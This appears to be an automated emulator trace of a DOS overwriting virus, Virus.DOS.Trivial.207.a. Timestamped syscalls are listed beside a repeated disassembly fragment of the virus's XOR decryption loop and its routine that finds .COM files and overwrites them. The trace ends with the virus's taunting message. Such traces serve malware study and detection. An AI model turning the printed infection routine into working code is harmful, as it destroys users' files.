Sample viewer

vx.netlux.org/Virus.DOS.Trivial.207.a

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:01:40.693394065Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x1d9
0x12a63: mov cx, 0xbd
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x1c9
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T23:01:40.696047481Z 78 PC: 12a7a | Find first file
2018-12-17T23:01:40.703388124Z 61 PC: 12a84 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:01:40.710622618Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:01:40.717668788Z 64 PC: 12a9a | Write file or device (Write 189 bytes on handle 5)
2018-12-17T23:01:40.721831239Z 62 PC: 12a9e | Close file
2018-12-17T23:01:40.738791507Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x1d9
0x12a63: mov cx, 0xbd
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x1c9
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T23:01:40.74162449Z 79 PC: 12a7a | Find next file
2018-12-17T23:01:40.745711199Z 61 PC: 12a84 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:01:40.752799057Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:01:40.75994265Z 64 PC: 12a9a | Write file or device (Write 189 bytes on handle 5)
2018-12-17T23:01:40.764007358Z 62 PC: 12a9e | Close file
2018-12-17T23:01:40.774660806Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x1d9
0x12a63: mov cx, 0xbd
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x1c9
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T23:01:40.777437553Z 79 PC: 12a7a | Find next file
2018-12-17T23:01:40.780891513Z 61 PC: 12a84 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:01:40.789091591Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:01:40.797221417Z 64 PC: 12a9a | Write file or device (Write 189 bytes on handle 5)
2018-12-17T23:01:40.80078869Z 62 PC: 12a9e | Close file
2018-12-17T23:01:40.810018834Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x1d9
0x12a63: mov cx, 0xbd
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x1c9
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T23:01:40.812316511Z 79 PC: 12a7a | Find next file
2018-12-17T23:01:40.815156498Z 61 PC: 12a84 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:01:40.823557594Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:01:40.831620753Z 64 PC: 12a9a | Write file or device (Write 189 bytes on handle 5)
2018-12-17T23:01:40.83589222Z 62 PC: 12a9e | Close file
2018-12-17T23:01:40.843376442Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x1d9
0x12a63: mov cx, 0xbd
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x1c9
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T23:01:40.845688266Z 79 PC: 12a7a | Find next file
2018-12-17T23:01:40.848044804Z 61 PC: 12a84 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:01:40.855883894Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:01:40.863030012Z 64 PC: 12a9a | Write file or device (Write 189 bytes on handle 5)
2018-12-17T23:01:40.865969666Z 62 PC: 12a9e | Close file
2018-12-17T23:01:40.875319033Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x1d9
0x12a63: mov cx, 0xbd
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x1c9
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T23:01:40.877847715Z 79 PC: 12a7a | Find next file
2018-12-17T23:01:40.880698521Z 61 PC: 12a84 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:01:40.887846312Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:01:40.895268428Z 64 PC: 12a9a | Write file or device (Write 189 bytes on handle 5)
2018-12-17T23:01:40.89801543Z 62 PC: 12a9e | Close file
2018-12-17T23:01:40.906869156Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x1d9
0x12a63: mov cx, 0xbd
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x1c9
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T23:01:40.909454795Z 79 PC: 12a7a | Find next file
2018-12-17T23:01:40.912388177Z 61 PC: 12a84 | Open file (Filename = 'PAH.COM')
2018-12-17T23:01:40.919785275Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:01:40.928653889Z 64 PC: 12a9a | Write file or device (Write 189 bytes on handle 5)
2018-12-17T23:01:40.931641794Z 62 PC: 12a9e | Close file
2018-12-17T23:01:40.940247454Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x1d9
0x12a63: mov cx, 0xbd
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x1c9
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T23:01:40.943797424Z 79 PC: 12a7a | Find next file
2018-12-17T23:01:40.946768026Z 61 PC: 12a84 | Open file (Filename = 'TEST.COM')
2018-12-17T23:01:40.953834033Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:01:40.958081845Z 64 PC: 12a9a | Write file or device (Write 189 bytes on handle 5)
2018-12-17T23:01:40.960978969Z 62 PC: 12a9e | Close file
2018-12-17T23:01:40.969432623Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x1d9
0x12a63: mov cx, 0xbd
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x1c9
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T23:01:40.972809548Z 79 PC: 12a7a | Find next file
2018-12-17T23:01:40.975641259Z 9 PC: 12aac | Display string (String= 'A vir 4 da simple minded people of earth Since ya didn't notice dis vir.. YAR LAME....')
2018-12-17T23:01:40.981848443Z 76 PC: 12ab0 | Terminate with return code (Return code = '36')